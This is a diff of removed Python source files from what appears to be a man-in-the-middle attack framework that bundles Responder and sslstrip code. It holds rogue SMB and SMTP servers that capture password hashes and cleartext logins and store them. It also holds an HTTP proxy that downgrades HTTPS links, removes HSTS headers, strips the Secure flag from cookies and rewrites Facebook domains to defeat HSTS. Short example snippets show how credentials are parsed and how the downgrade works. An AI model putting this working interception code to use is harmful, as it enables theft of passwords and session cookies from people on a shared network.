Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##NT_CREATE Access Denied.
if data[8:10] == "\xa2\x00":
Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Trans2 Access Denied.
if data[8:10] == "\x25\x00":
Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##LogOff.
if data[8:10] == "\x74\x00":
Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x02\xff\x00\x27\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except socket.timeout:
pass
# SMB Server class, old version
class SMB1LM(BaseRequestHandler):
def handle(self):
try:
self.request.settimeout(0.5)
data = self.request.recv(1024)
##session request 139
if data[0] == "\x81":
Buffer = "\x82\x00\x00\x00"
self.request.send(Buffer)
data = self.request.recv(1024)
##Negotiate proto answer.
if data[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=settings.Config.Challenge)
Body.calculate()
Packet = str(head)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Session Setup AndX Request
if data[8:10] == "\x73\x00":
if Is_LMNT_Anonymous(data):
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head)+str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
else:
ParseLMNTHash(data,self.client_address[0])
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head)+str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except Exception:
self.request.close()
pass

View file

@ -1,98 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import core.responder.settings as settings
import threading
from traceback import print_exc
from core.responder.utils import *
from base64 import b64decode, b64encode
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2
class SMTP:
def start(self):
try:
if OsInterfaceIsSupported():
server1 = ThreadingTCPServer((settings.Config.Bind_To, 25), ESMTP)
server2 = ThreadingTCPServer((settings.Config.Bind_To, 587), ESMTP)
else:
server1 = ThreadingTCPServer(('', 25), ESMTP)
server2 = ThreadingTCPServer(('', 587), ESMTP)
for server in [server1, server2]:
t = threading.Thread(name='SMTP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting SMTP server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# ESMTP Server class
class ESMTP(BaseRequestHandler):
def handle(self):
try:
self.request.send(str(SMTPGreeting()))
data = self.request.recv(1024)
if data[0:4] == "EHLO":
self.request.send(str(SMTPAUTH()))
data = self.request.recv(1024)
if data[0:4] == "AUTH":
self.request.send(str(SMTPAUTH1()))
data = self.request.recv(1024)
if data:
try:
User = filter(None, b64decode(data).split('\x00'))
Username = User[0]
Password = User[1]
except:
Username = b64decode(data)
self.request.send(str(SMTPAUTH2()))
data = self.request.recv(1024)
if data:
try: Password = b64decode(data)
except: Password = data
SaveToDb({
'module': 'SMTP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Username,
'cleartext': Password,
'fullhash': Username+":"+Password,
})
except Exception:
pass
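To illustrate the credential parsing above (example only, with invented credentials): an AUTH PLAIN client sends base64("\0user\0password") in a single blob, which the filter/split line unpacks, while AUTH LOGIN sends each field base64-encoded on its own:

from base64 import b64encode, b64decode

blob = b64encode('\x00alice\x00S3cr3t!')             # what an AUTH PLAIN client would send
print filter(None, b64decode(blob).split('\x00'))    # -> ['alice', 'S3cr3t!']
print b64encode('alice'), b64encode('S3cr3t!')       # AUTH LOGIN sends the fields separately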

View file

@ -1,246 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import urlparse
import logging
import os
import sys
import random
import re
import dns.resolver
from twisted.web.http import Request
from twisted.web.http import HTTPChannel
from twisted.web.http import HTTPClient
from twisted.internet import ssl
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet.protocol import ClientFactory
from ServerConnectionFactory import ServerConnectionFactory
from ServerConnection import ServerConnection
from SSLServerConnection import SSLServerConnection
from URLMonitor import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache
from core.logger import logger
formatter = logging.Formatter("%(asctime)s [ClientRequest] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ClientRequest", formatter)
class ClientRequest(Request):
''' This class represents incoming client requests and is essentially where
the magic begins. Here we remove the client headers we don't like, and then
respond with either favicon spoofing, session denial, or proxy through HTTP
or SSL to the server.
'''
def __init__(self, channel, queued, reactor=reactor):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().hsts
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
#self.uniqueId = random.randint(0, 10000)
#Use our own DNS server instead of reactor.resolve()
self.customResolver = dns.resolver.Resolver()
self.customResolver.nameservers = ['127.0.0.1']
def cleanHeaders(self):
headers = self.getAllHeaders().copy()
if self.hsts:
if 'referer' in headers:
real = self.urlMonitor.real
if len(real) > 0:
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost(str(headers['host']))
log.debug("Modifing HOST header: {} -> {}".format(headers['host'], host))
headers['host'] = host
self.setHeader('Host', host)
if 'accept-encoding' in headers:
del headers['accept-encoding']
log.debug("Zapped encoding")
if self.urlMonitor.caching is False:
if 'if-none-match' in headers:
del headers['if-none-match']
if 'if-modified-since' in headers:
del headers['if-modified-since']
headers['pragma'] = 'no-cache'
return headers
def getPathFromUri(self):
if (self.uri.find("http://") == 0):
index = self.uri.find('/', 7)
return self.uri[index:]
return self.uri
def getPathToLockIcon(self):
if os.path.exists("lock.ico"): return "lock.ico"
scriptPath = os.path.abspath(os.path.dirname(sys.argv[0]))
scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico")
if os.path.exists(scriptPath): return scriptPath
log.warning("Error: Could not find lock.ico")
return "lock.ico"
def handleHostResolvedSuccess(self, address):
log.debug("Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
host = self.getHeader("host")
headers = self.cleanHeaders()
client = self.getClientIP()
path = self.getPathFromUri()
url = 'http://' + host + path
self.uri = url # set URI to absolute
if self.content:
self.content.seek(0,0)
postData = self.content.read()
if self.hsts:
host = self.urlMonitor.URLgetRealHost(str(host))
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict
url = 'http://' + host + path
self.uri = url # set URI to absolute
if real:
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if patchDict:
dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
headers['content-length'] = str(len(postData))
#self.dnsCache.cacheResolution(host, address)
hostparts = host.split(':')
self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
log.debug("Sending expired cookies")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
log.debug("Sending spoofed favicon response")
self.sendSpoofedFaviconResponse()
elif self.urlMonitor.isSecureLink(client, url):
log.debug("Sending request via SSL/TLS: {}".format(url))
self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
else:
log.debug("Sending request via HTTP")
#self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
port = int(hostparts[1])
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
def handleHostResolvedError(self, error):
log.debug("Host resolution error: {}".format(error))
try:
self.finish()
except:
pass
def resolveHost(self, host):
address = self.dnsCache.getCachedAddress(host)
if address != None:
log.debug("Host cached: {} {}".format(host, address))
return defer.succeed(address)
else:
log.debug("Host not cached.")
self.customResolver.port = self.urlMonitor.getResolverPort()
try:
log.debug("Resolving with DNSChef")
address = str(self.customResolver.query(host)[0].address)
return defer.succeed(address)
except Exception:
log.debug("Exception occured, falling back to Twisted")
return reactor.resolve(host)
def process(self):
if self.getHeader('host') is not None:
log.debug("Resolving host: {}".format(self.getHeader('host')))
host = self.getHeader('host').split(":")[0]
if self.hsts:
host = self.urlMonitor.URLgetRealHost(str(host))
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)
def proxyViaHTTP(self, host, method, path, postData, headers, port):
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = ServerConnection
#self.reactor.connectTCP(host, 80, connectionFactory)
self.reactor.connectTCP(host, port, connectionFactory)
def proxyViaSSL(self, host, method, path, postData, headers, port):
clientContextFactory = ssl.ClientContextFactory()
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = SSLServerConnection
self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
def sendExpiredCookies(self, host, path, expireHeaders):
self.setResponseCode(302, "Moved")
self.setHeader("Connection", "close")
self.setHeader("Location", "http://" + host + path)
for header in expireHeaders:
self.setHeader("Set-Cookie", header)
self.finish()
def sendSpoofedFaviconResponse(self):
icoFile = open(self.getPathToLockIcon())
self.setResponseCode(200, "OK")
self.setHeader("Content-type", "image/x-icon")
self.write(icoFile.read())
icoFile.close()
self.finish()
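cleanHeaders() and handleHostResolvedSuccess() above both map tokenized HSTS hostnames back to the real ones by building a single alternation regex over the URLMonitor's real dictionary. A standalone sketch of that substitution pattern, with an invented mapping and Referer value:

import re

real = {'webaccounts.example.com': 'accounts.example.com'}   # tokenized host -> real host
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))

referer = 'http://webaccounts.example.com/login'
print dregex.sub(lambda x: str(real[x.string[x.start():x.end()]]), referer)
# -> http://accounts.example.com/login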

View file

@ -1,62 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
from core.logger import logger
formatter = logging.Formatter("%(asctime)s [DnsCache] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DnsCache", formatter)
class DnsCache:
'''
The DnsCache maintains a cache of DNS lookups, mirroring the browser experience.
'''
_instance = None
def __init__(self):
self.customAddress = None
self.cache = {}
@staticmethod
def getInstance():
if DnsCache._instance == None:
DnsCache._instance = DnsCache()
return DnsCache._instance
def cacheResolution(self, host, address):
self.cache[host] = address
def getCachedAddress(self, host):
if host in self.cache:
return self.cache[host]
return None
def setCustomRes(self, host, ip_address=None):
if ip_address is not None:
self.cache[host] = ip_address
log.debug("DNS entry set: %s -> %s" %(host, ip_address))
else:
if self.customAddress is not None:
self.cache[host] = self.customAddress
def setCustomAddress(self, ip_address):
self.customAddress = ip_address
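A minimal usage sketch of the singleton above (host names and addresses are examples, not part of the original file):

cache = DnsCache.getInstance()
cache.cacheResolution('example.com', '93.184.216.34')
print cache.getCachedAddress('example.com')        # -> 93.184.216.34
print cache.getCachedAddress('unknown.host')       # -> None
cache.setCustomRes('intranet.local', '10.0.0.5')   # pin a host to a chosen address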

View file

@ -1,136 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import re
import string
from ServerConnection import ServerConnection
from URLMonitor import URLMonitor
from core.logger import logger
formatter = logging.Formatter("%(asctime)s [SSLServerConnection] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("SSLServerConnection", formatter)
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().hsts
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if self.hsts:
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
log.debug("Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.real
if dominio in real:
v=" Domain=%s"%real[dominio]
log.debug("New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
else:
if (key.lower() == 'set-cookie'):
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
log.debug("Found path-relative link in secure transmission: " + link)
log.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
log.debug("Found relative link in secure transmission: " + link)
log.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceFavicon(self, data):
match = re.search(SSLServerConnection.iconExpression, data)
if (match != None):
data = re.sub(SSLServerConnection.iconExpression,
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
else:
data = re.sub(SSLServerConnection.headExpression,
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
if (self.urlMonitor.isFaviconSpoofing()):
data = self.replaceFavicon(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data
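The cookieExpression above is what strips the Secure attribute so that cookies keep flowing over the downgraded plain-HTTP session. A standalone example with an invented Set-Cookie value:

import re

cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
print cookieExpression.sub("\g<1>", "sid=abc123; Path=/; Secure; HttpOnly")
# -> sid=abc123; Path=/; HttpOnly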

View file

@ -1,273 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import re
import string
import random
import zlib
import gzip
import StringIO
import sys
from user_agents import parse
from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor
from core.proxyplugins import ProxyPlugins
from core.logger import logger
formatter = logging.Formatter("%(asctime)s %(clientip)s [type:%(browser)s-%(browserv)s os:%(clientos)s] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
clientlog = logger().setup_logger("ServerConnection_clientlog", formatter)
formatter = logging.Formatter("%(asctime)s [ServerConnection] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ServerConnection", formatter)
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
comes back is examined. The headers we don't like are removed, and the links are stripped
from HTTPS to HTTP.
'''
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
urlType = re.compile(r"https://", re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
#urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
self.clientInfo = {}
self.plugins = ProxyPlugins()
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().hsts
self.app = URLMonitor.getInstance().app
self.isImageRequest = False
self.isCompressed = False
self.contentLength = None
self.shutdownComplete = False
self.handle_post_output = False
def sendRequest(self):
if self.command == 'GET':
clientlog.info(self.headers['host'], extra=self.clientInfo)
log.debug("Full request: {}{}".format(self.headers['host'], self.uri))
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.iteritems():
log.debug("Sending header: ({}: {})".format(header, value))
self.sendHeader(header, value)
self.endHeaders()
def sendPostData(self):
if self.handle_post_output is False: #So we can disable printing POST data coming from plugins
try:
postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
if len(postdata) > 0:
clientlog.warning("POST Data ({}):\n{}".format(self.headers['host'], postdata), extra=self.clientInfo)
except Exception as e:
if 'UnicodeDecodeError' in e.message or 'UnicodeEncodeError' in e.message:
log.debug("{} Ignored post data from {}".format(self.clientInfo['clientip'], self.headers['host']))
self.handle_post_output = False
self.transport.write(self.postData)
def connectionMade(self):
log.debug("HTTP connection made.")
try:
user_agent = parse(self.headers['user-agent'])
self.clientInfo["clientos"] = user_agent.os.family
self.clientInfo["browser"] = user_agent.browser.family
try:
self.clientInfo["browserv"] = user_agent.browser.version[0]
except IndexError:
self.clientInfo["browserv"] = "Other"
except KeyError:
self.clientInfo["clientos"] = "Other"
self.clientInfo["browser"] = "Other"
self.clientInfo["browserv"] = "Other"
self.clientInfo["clientip"] = self.client.getClientIP()
self.plugins.hook()
self.sendRequest()
self.sendHeaders()
if (self.command == 'POST'):
self.sendPostData()
def handleStatus(self, version, code, message):
values = self.plugins.hook()
version = values['version']
code = values['code']
message = values['message']
log.debug("Server response: {} {} {}".format(version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
if self.app:
self.urlMonitor.addRedirection(self.client.uri, value)
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
log.debug("Response is image content, not scanning")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
log.debug("Response is compressed")
self.isCompressed = True
elif (key.lower()== 'strict-transport-security'):
clientlog.info("Zapped a strict-transport-security header", extra=self.clientInfo)
elif (key.lower() == 'content-length'):
self.contentLength = value
elif (key.lower() == 'set-cookie'):
self.client.responseHeaders.addRawHeader(key, value)
else:
self.client.setHeader(key, value)
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
self.client.setHeader("Expires", "0")
self.client.setHeader("Cache-Control", "No-Cache")
if self.length == 0:
self.shutdown()
self.plugins.hook()
if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
for header, value in self.headers.iteritems():
log.debug("Receiving header: ({}: {})".format(header, value))
def handleResponsePart(self, data):
if (self.isImageRequest):
self.client.write(data)
else:
HTTPClient.handleResponsePart(self, data)
def handleResponseEnd(self):
if (self.isImageRequest):
self.shutdown()
else:
#Gets rid of some generic errors
try:
HTTPClient.handleResponseEnd(self)
except:
pass
def handleResponse(self, data):
if (self.isCompressed):
log.debug("Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
data = self.replaceSecureLinks(data)
data = self.plugins.hook()['data']
#log.debug("Read from server {} bytes of data:\n{}".format(len(data), data))
log.debug("Read from server {} bytes of data".format(len(data)))
if (self.contentLength != None):
self.client.setHeader('Content-Length', len(data))
try:
self.client.write(data)
except:
pass
try:
self.shutdown()
except:
log.info("Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
if self.hsts:
sustitucion = {}
patchDict = self.urlMonitor.patchDict
if patchDict:
dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
log.debug("Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)
log.debug("Replacing {} => {}".format(url,nuevaurl))
sustitucion[url] = nuevaurl
if sustitucion:
dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
return data
else:
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
log.debug("Found secure reference: " + url)
url = url.replace('https://', 'http://', 1)
url = url.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
return re.sub(ServerConnection.urlType, 'http://', data)
def shutdown(self):
if not self.shutdownComplete:
self.shutdownComplete = True
try:
self.client.finish()
self.transport.loseConnection()
except:
pass
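In non-HSTS mode replaceSecureLinks() reduces to the two substitutions at the end of the method: rewrite explicit-port HTTPS URLs, then downgrade the scheme. Applied to an invented snippet:

import re

urlType = re.compile(r"https://", re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)

html = '<a href="https://login.example.com:8443/auth">Sign in</a>'
html = re.sub(urlExplicitPort, r'http://\1/', html)
print re.sub(urlType, 'http://', html)
# -> <a href="http://login.example.com/auth">Sign in</a>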

View file

@ -1,51 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
from core.logger import logger
from twisted.internet.protocol import ClientFactory
formatter = logging.Formatter("%(asctime)s [ServerConnectionFactory] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ServerConnectionFactory", formatter)
class ServerConnectionFactory(ClientFactory):
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
def buildProtocol(self, addr):
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
def clientConnectionFailed(self, connector, reason):
log.debug("Server connection failed.")
destination = connector.getDestination()
if (destination.port != 443):
log.debug("Retrying via SSL")
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
else:
try:
self.client.finish()
except:
pass

View file

@ -1,175 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import re, os
import logging
from core.configwatcher import ConfigWatcher
from core.logger import logger
formatter = logging.Formatter("%(asctime)s [URLMonitor] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("URLMonitor", formatter)
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
server is expecting over SSL. It also keeps track of secure favicon urls.
'''
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = dict()
real = dict()
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
'return"https:"':'return"http:"'
}
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = {}
self.redirects = []
